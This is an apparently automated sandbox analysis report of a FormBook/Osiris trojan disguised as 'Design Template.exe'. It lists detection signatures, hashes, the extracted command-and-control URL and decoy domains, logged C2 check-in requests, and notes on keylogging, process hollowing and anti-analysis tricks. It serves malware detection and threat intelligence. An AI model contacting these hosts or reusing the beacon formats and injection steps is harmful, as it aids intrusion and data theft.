Analysis Report Design Template.exe

Overview

General Information

Sample Name: Design Template.exe
Analysis ID: 385453
MD5: 56d56566623a2bc942141b56f9dd3da5
SHA1: bc76bd9c064a7df36b84d5e08f266c8d4d9819ee
SHA256: 5397f0168be76c7e5efee936d341eb359b9015af5e77631129dc0664105e9259
Tags: exe
Infos:

Most interesting Screenshot:

Detection

Osiris FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Osiris Trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus / Scanner detection for submitted sample
Source: Design Template.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.zq2003.com/ma3c/"], "decoy": ["bensimonconstructions.com", "margaretta.info", "getreireply.com", "jamierighetti.com", "gxjljc.com", "internet-exerzitien.com", "appetiteintelligence.com", "buscar-id-apple.com", "unique-bikinis.com", "enclassique.com", "dafontonline.com", "northamericancarbonexchange.com", "yashasvsaluja.com", "sn-international.com", "humanvitality.site", "sarahcasias.com", "xn--vrv276h3cb.com", "curiget.xyz", "anxietyattackscure.com", "angelstonecrystals.com", "onestripemed.com", "mirgran.com", "boxtechtv.com", "healthcontrol.net", "eroutescheduling.com", "betralifcannabis.com", "advancefulfillmentcenter.net", "graphicprofessor.com", "booster-tresorerie.com", "intibeso.xyz", "modomo.amsterdam", "rionaluo.net", "6streeam.xyz", "mobundlesco.com", "sacredlight.store", "xy4869.com", "xn--casamio-9za.com", "herma-shop.com", "cfphoenixmembers.com", "ssrpss.info", "realunitystudio.com", "itsjustinscode.com", "wannabebody.com", "bwbcoa.com", "unitednations-office.com", "dallasmalerevuetix.com", "bestflowersandgifts.com", "lojasmegamoveis.com", "fyahvapes.com", "salvofoods.com", "meditationwithdaniel.com", "2elden.com", "romitoart.com", "sci-mfg.com", "xn--hy1bw5cd1ic1e75g84omki.com", "erwinsiahaan.com", "landreclaim.com", "chuanyangwenhua.com", "zzfuwusheji.com", "cannabiss.clinic", "sexichef.com", "aymauxilia.com", "conchcruiserswestpalm.com", "rememberingedward.info"]}
Multi AV Scanner detection for submitted file
Source: Design Template.exe Virustotal: Detection: 34% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Design Template.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.2.rundll32.exe.7b4cd8.1.unpack Avira: Label: TR/Patched.Gen
Source: 14.2.rundll32.exe.4997960.5.unpack Avira: Label: TR/Patched.Gen

Compliance:

barindex
Uses 32bit PE files
Source: Design Template.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Design Template.exe, 00000004.00000002.329265577.0000000000AFF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.506121630.000000000457F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Design Template.exe, rundll32.exe
Source: Binary string: rundll32.pdb source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: Design Template.exe, 00000004.00000002.329733496.0000000002620000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.308122026.000000000E6F0000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop ebx 14_2_004F6A98
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 14_2_005062A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 14_2_004FC3B1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 14_2_00505672

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49737 -> 204.11.56.48:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.zq2003.com/ma3c/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1Host: www.zq2003.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1Host: www.betralifcannabis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1Host: www.2elden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1Host: www.landreclaim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1Host: www.rememberingedward.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1Host: www.chuanyangwenhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1Host: www.bestflowersandgifts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1Host: www.sci-mfg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1Host: www.sexichef.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: global traffic HTTP traffic detected: GET /ma3c/?_h0PX=Gz+aoBPIJMIekXk3JsVdGsrVgmXfAgzKyy9hyMbSTriZHiVLNZmhNLWpckAwWma5tVpoOvHwTA==&nflpdH=xVJtBJipx HTTP/1.1Host: www.zq2003.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=Va4Ksj86yCgOFLNPhm+pHKG99OfqBZ9kfeFppHGmoUJffb1lK9bId45lnDO36EhwcfHg23q4hQ== HTTP/1.1Host: www.betralifcannabis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=dtjU+FMvo+K0Hy2rJYJ4DlSiBEZivW2cseEeC9QykUoFZ//bqj3e3OnwJH2q0JCt3Y48Pt7erw== HTTP/1.1Host: www.2elden.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?_h0PX=7OYBgr9QTbWzQEqxE5F2WSPs+5f12FdEeOVATof0xMsEqgRBEzo+rxwtbbYEgcdUMYm0l9yvIw==&nflpdH=xVJtBJipx HTTP/1.1Host: www.landreclaim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=RuFpatm7w3m/GHk8xUv8fbdHxofOzIP3Dox3D+RGa/EJfN2FdDJ31PqXCKFVKmmG9jkHvetkoA== HTTP/1.1Host: www.rememberingedward.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?_h0PX=2MgTmInwKAFXORySzOhWikkJNLfSb5eys+c5OewZSV9pJ7GqMjdkEgpEBVTJsJvFnWJ8QAWSFg==&nflpdH=xVJtBJipx HTTP/1.1Host: www.chuanyangwenhua.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=IYnhIGwcQmbdxEO5DsUkvq5x/f/PoDEr3kEuTATZH4q1+Xg6K+Y8FVJqSC6GxdnWJvbcnap46w== HTTP/1.1Host: www.bestflowersandgifts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=6w2wX9052gwDzHc+6ODPhIZFPdBQiC5v+fUP1qbbipTXUM2PhMECBJTSXWpwe4MsJEjxMxxOZQ== HTTP/1.1Host: www.sci-mfg.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ma3c/?nflpdH=xVJtBJipx&_h0PX=zjRNxAcCRCg7Q4faxm7O9/wlBfqcu26Ht8wCsETVdMApM4UO++TRNwkGPLPsxzY/h5O+ZiCdmw== HTTP/1.1Host: www.sexichef.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: <a href="https://www.facebook.com/OnlyDomains" target="_blank" rel="nofollow" title="OnlyDomains Facebook"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: www.modomo.amsterdam
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 12:42:39 GMTServer: Apache/2.4.46 (Win32) OpenSSL/1.1.1g mod_fcgid/2.3.9aContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmp String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000007.00000000.308827375.000000000ECFB000.00000004.00000001.sdmp String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.298632353.0000000006870000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000007.00000000.306070200.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css2?family=Inter:wght
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css2?family=Montserrat:wght
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/onlydomains
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://www.onlydomains.com/hosting/?utm_medium=free_parking&utm_source=landreclaim.com
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://www.onlydomains.com?utm_medium=free_parking&utm_source=landreclaim.com
Source: rundll32.exe, 0000000E.00000002.509415460.0000000004B12000.00000004.00000001.sdmp String found in binary or memory: https://www.trustpilot.com/review/onlydomains.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042CCDA GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 2_2_0042CCDA
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0042E537 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 2_2_0042E537

E-Banking Fraud:

barindex
Detected Osiris Trojan
Source: C:\Users\user\Desktop\Design Template.exe File created: C:\Users\user\AppData\Local\Temp\Liebert.bmp Jump to dropped file
Yara detected FormBook
Source: Yara match File source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.329067264.00000000009A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.502155001.0000000000720000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.329542692.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.502311123.0000000000750000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.280097303.0000000000613000.00000004.00000020.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.501445040.00000000004F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\Liebert.bmp, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434168 NtCreateFile, 2_2_00434168
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043816D NtTerminateProcess, 2_2_0043816D
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A3B8 NtCreateFile,NtCreateSection,NtMapViewOfSection, 2_2_0043A3B8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043A5B8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose, 2_2_0043A5B8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434678 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose, 2_2_00434678
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_004356B8 NtWriteFile,NtCreateSection,NtClose, 2_2_004356B8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00433FF8 NtAllocateVirtualMemory, 2_2_00433FF8
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434798 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtGetContextThread,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 2_2_00434798
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_0043501A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 2_2_0043501A
Source: C:\Users\user\Desktop\Design Template.exe Code function: 2_2_00434D27 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection, 2_2_00434D27
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk, 4_2_00A498F0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_00A49860
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49840 NtDelayExecution,LdrInitializeThunk, 4_2_00A49840
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A499A0 NtCreateSection,LdrInitializeThunk, 4_2_00A499A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_00A49910
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A20 NtResumeThread,LdrInitializeThunk, 4_2_00A49A20
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_00A49A00
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A50 NtCreateFile,LdrInitializeThunk, 4_2_00A49A50
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A495D0 NtClose,LdrInitializeThunk, 4_2_00A495D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49540 NtReadFile,LdrInitializeThunk, 4_2_00A49540
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_00A496E0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_00A49660
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_00A497A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49780 NtMapViewOfSection,LdrInitializeThunk, 4_2_00A49780
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49FE0 NtCreateMutant,LdrInitializeThunk, 4_2_00A49FE0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49710 NtQueryInformationToken,LdrInitializeThunk, 4_2_00A49710
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A498A0 NtWriteVirtualMemory, 4_2_00A498A0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49820 NtEnumerateKey, 4_2_00A49820
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4B040 NtSuspendThread, 4_2_00A4B040
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A499D0 NtCreateProcessEx, 4_2_00A499D0
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49950 NtQueueApcThread, 4_2_00A49950
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A80 NtOpenDirectoryObject, 4_2_00A49A80
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A49A10 NtQuerySection, 4_2_00A49A10
Source: C:\Users\user\Desktop\Design Template.exe Code function: 4_2_00A4A3B0 NtGetContextThread, 4_2_00A4A3B0
